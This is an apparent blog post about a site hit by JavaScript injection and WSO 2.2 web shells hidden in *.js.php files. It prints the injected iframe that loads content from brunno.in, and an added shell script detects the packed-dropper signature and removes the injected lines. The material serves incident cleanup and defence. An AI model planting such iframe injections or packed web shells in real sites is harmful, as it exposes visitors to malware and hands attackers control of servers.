brunno.in JS injection using WSO 2.2

A client recently gave me a call saying his website was throwing a malware warning when visited using Google Chrome.

[Screenshot: Chrome Malware Warning]

A bit of research indicated that somehow the attacker gained access to the site, installed a Web Shell script in *.js.php files and injected JS code into existing JS files.

Google’s Webmaster Tools showed the injected code in the JS file:

[Screenshot: Injected JS]

The above code, once processed, created an iframe that led to another site which presumably hosted the malicious payload:

<iframe frameborder="0" width="10" height="10" src="http://brunno.in/showthread.php?t=37220338"></iframe>

The other file, *.js.php, is gzipped and base64-encoded. Once inflated and decoded it turns out to be a web shell script, specifically WSO 2.2. This lets the attacker run server-side functions from the browser and easily insert malicious code into the site's files.

You can find the inflated and decoded code here: WSO 2.2

What to do?
You can manually look through your files and remove all occurrences, or, if you have SSH access, log in to your server and use egrep/sed to match the recurring pattern and remove it.
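As an added example (not part of the original post), here is a small POSIX shell script that does the egrep/sed sweep described above over a constructed web root: it lists JS files containing the brunno.in iframe marker and *.js.php files wrapping a gzinflate/base64 payload, then strips the injected lines while keeping a backup. The marker string, the `eval(gzinflate(base64_decode(` wrapper signature and the sample files are assumptions, since the post shows the injected JS only as an image.

```shell
#!/bin/sh
# Added example, not from the original post: hunt for the two artifacts the
# post describes and strip the injected JS line. Assumes the injected JS is a
# single line mentioning brunno.in/showthread.php (the real sample is only
# shown as an image) and that the dropper uses eval(gzinflate(base64_decode(.

MARKER='brunno.in/showthread.php'

# List *.js files under $1 whose contents contain the injection marker.
find_injected_js() {
  find "$1" -type f -name '*.js' -exec grep -lF "$MARKER" {} + 2>/dev/null
}

# List *.js.php files under $1 that carry the packed-shell wrapper
# (the post's shell was gzipped and base64 encoded).
find_webshell_php() {
  find "$1" -type f -name '*.js.php' \
    -exec grep -lE 'eval\(gzinflate\(base64_decode\(' {} + 2>/dev/null
}

# Delete every line containing the marker from JS file $1, keeping a .bak copy.
strip_injected_lines() {
  sed -i.bak '/brunno\.in\/showthread\.php/d' "$1"
}

# Build a constructed web root: one clean JS file, one JS file with the
# injected document.write line, and one fake *.js.php dropper with a
# placeholder (not a real payload), so the functions can be run offline.
make_sample_webroot() {
  d=$(mktemp -d)
  mkdir -p "$d/js"
  printf 'function init(){console.log("ok");}\n' > "$d/js/clean.js"
  printf 'function init(){console.log("ok");}\n' > "$d/js/app.js"
  printf 'document.write("<iframe frameborder=\\"0\\" width=\\"10\\" height=\\"10\\" src=\\"http://%s?t=37220338\\"></iframe>");\n' \
    "$MARKER" >> "$d/js/app.js"
  printf '<?php eval(gzinflate(base64_decode("PLACEHOLDER_NOT_A_REAL_PAYLOAD"))); ?>\n' \
    > "$d/js/jquery.js.php"
  echo "$d"
}
```

Review the `.bak` copies and the flagged *.js.php files before deleting anything; a file that merely references the domain in a comment would also be caught by the marker.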


One Comment

  1. Posted December 25, 2011 at 17:45 | Permalink

    Thank you. Thank you. Thank you. I really appreciate your taking the time to post this.
